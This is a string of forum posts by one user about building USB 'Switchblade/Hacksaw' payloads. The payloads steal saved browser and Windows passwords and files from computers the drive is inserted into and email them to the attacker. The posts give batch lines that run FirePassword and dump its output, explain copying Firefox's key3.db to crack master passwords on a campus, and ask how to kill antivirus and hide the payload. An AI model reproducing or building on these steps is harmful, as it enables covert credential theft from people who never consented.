Posts posted by therian16

  1. I added the Hacksaw payload to my Switchblade so here's what I did and how I protect myself:

    1. copied SBS to CMD folder as required

    2. created a hacksaw.bat with the go.cmd from the hacksaw payload

    3. added <call hacksaw.bat> to the top of the Switchblade go.cmd

    4. to protect my personal computer I created a file called test.txt at c:test.txt

    5. in the hacksaw.bat I added this line to the top

    if exist c:test.txt goto end

    and created the :end tag at the bottom.

    This not only adds Hacksaw to Switchblade but also protects your personal computer from infection while using your own .

    One thing I would like to add still is some kind of delay on running sbs.exe. Is there a way to get system time, then add say 5-15 minutes, then have sbs execute? That would get rid of sending your own Hacksaw program to yourself.

  2. The problem that I was referring to, aardwolf, is when I infect a computer for the first time it copies my wip folder and sends that to myself. Is there a setting to exclude certain folders on a usb? If so just ignore wip and my problem is solved.

    Also you mention there is a way to only grab certain types of documents, how is that set up?

  3. A couple of questions

    Is there a way to make this a timed thing?

    Example: Insert drive on Monday and have it antidote itself Friday, or maybe just run until the computer gets restarted.

    Every time the payload gets run I receive the file in Gmail but when I try to open it, I get an error that the file is unknown format or corrupt. Anyone else getting this?

    Is there a way to make the payload NOT run on my Hacksaw? Every time I insert my hacksaw into my computer it copies my entire payload and tries to send it. We need a way to run the payload and get it copied to the hard drive and have the payload run the next time a usb is inserted.

    Any ideas?

  4. I got done with my package earlier than I thought, it is now up on the wiki. If you have a suggestion on how it can be coded better or things I should add/delete, post it here. I want to hear from Moonlit before I add the avkiller so as soon as I do I'll add that to the builder.

    Complaints/congrats/anything welcome, let me know what you think.

  5. UPDATE

    I'm currently working on a small package to set up a switchblade with just the components a person wants via a batch script. Should be up in the wiki soon.

    What I'm looking for right now is a way to disable the popup when you insert a jump drive and it gives you the option to view folders and such. Is there a way to make the usb HAVE to be opened from my computer? That way it gives the registry time to accept my hide system folders command.

    Thanks.

  6. I love that program, it works great!

    If you come across a master password for firefox try firemaster from the same site. All you need is a decent dictionary file, which I'm having a hard time finding a good one of, any links someone could mention?

    If anyone has the same thing for Opera that is what I'm after next.

  7. As no one has brought this up before, in my situation I use my Switchblade a lot on the same computers transferring files from one to the other. Just to add a little stealthiness I added this line to my go.cmd

    if exist Documentslogfiles%computername%.log goto end

    This will essentially stop making copies of computers you already have info on. This isn't a necessity but on some older computers I noticed a small lag time while the payload is run. What do you guys think?

  8. I need some help from a dos coding Guru out there. Here's the situation:

    I have added the firepassword I mentioned earlier to my payload, works great but I need to expand on it.

    In the situation there is a Master password set for firefox, Firepassword comes up with an error saying it wants master password. I need to be able to copy the file key3.db from

    C:Documents and settings%username%Application dataMozillaFirefoxProfiles{random}.default

    (random meaning always different)

    and crack it later so I can feed the master password to firepassword.

    Progress so far:

    I can change to the directory using this .bat

    c:

    cd docume~1%username%applic~1mozillafirefoxprofiles

    cd *.default

    What I want is to be able to get the key3.db from this location to my Switchblade keeping in mind the drive letter changes depending on the computer

    I realize everyone uses different Master passwords but I'm on campus so all the passwords are the same campus wide and I can just enter the master password into firepassword and get the info from then on.

    Only idea I have come up with so far is setting drive letter of Switchblade to a variable then just: copy key3.db %variable%mylogfiles

    Any ideas how to accomplish this?

  9. Instead of trying to encrypt our exe's and dll's, can we figure out a way to suppress (read disable) av's altogether? I thought I read a post about killing processes from command script somewhere while doing research for this program but didn't look into it.

    Just to add my little piece to this project, I came across this little gem called firepassword that will get the username/password of everything firefox is told to remember. The only limitation is that the program cannot bypass master passwords. Installation is simple, just copy the 3 files to WIPCMD and add this line to your go.cmd.

    FirePassword.exe >Documentslogfiles%computername%.txt

    I edited my go.cmd so a new folder was created just for this txt file. If anyone needs this more explained I can post the changes I made.

    Here's the link for that program

    http://nagmatrix.50webs.com/article_firepassword.html

    Another idea I implemented was changing the logfile location to WIPlogfiles. I think it is better for the social engineering aspect because if you're having someone open your Switchblade to saveget something, they go to documents and see logfiles folder. Anyone curious what is in there? This way it's already in one (hidden) folder and if they find WIP you're already in trouble.

    Let me know what you think, sorry for the long post.

    Next personal project: cracking wand.dat from Opera. Anyone wanna help? (Supposedly Uncrackable)

  10. Great work on the project so far but we need a few more files encrypted.

    netpass.exe

    mspass.exe

    and the 6.0 version of pwdump would

    Alternative to pwdump is fgdump. Looks and sounds good but it needs to be encrypted before I can test it fully. Thanks Brainkill
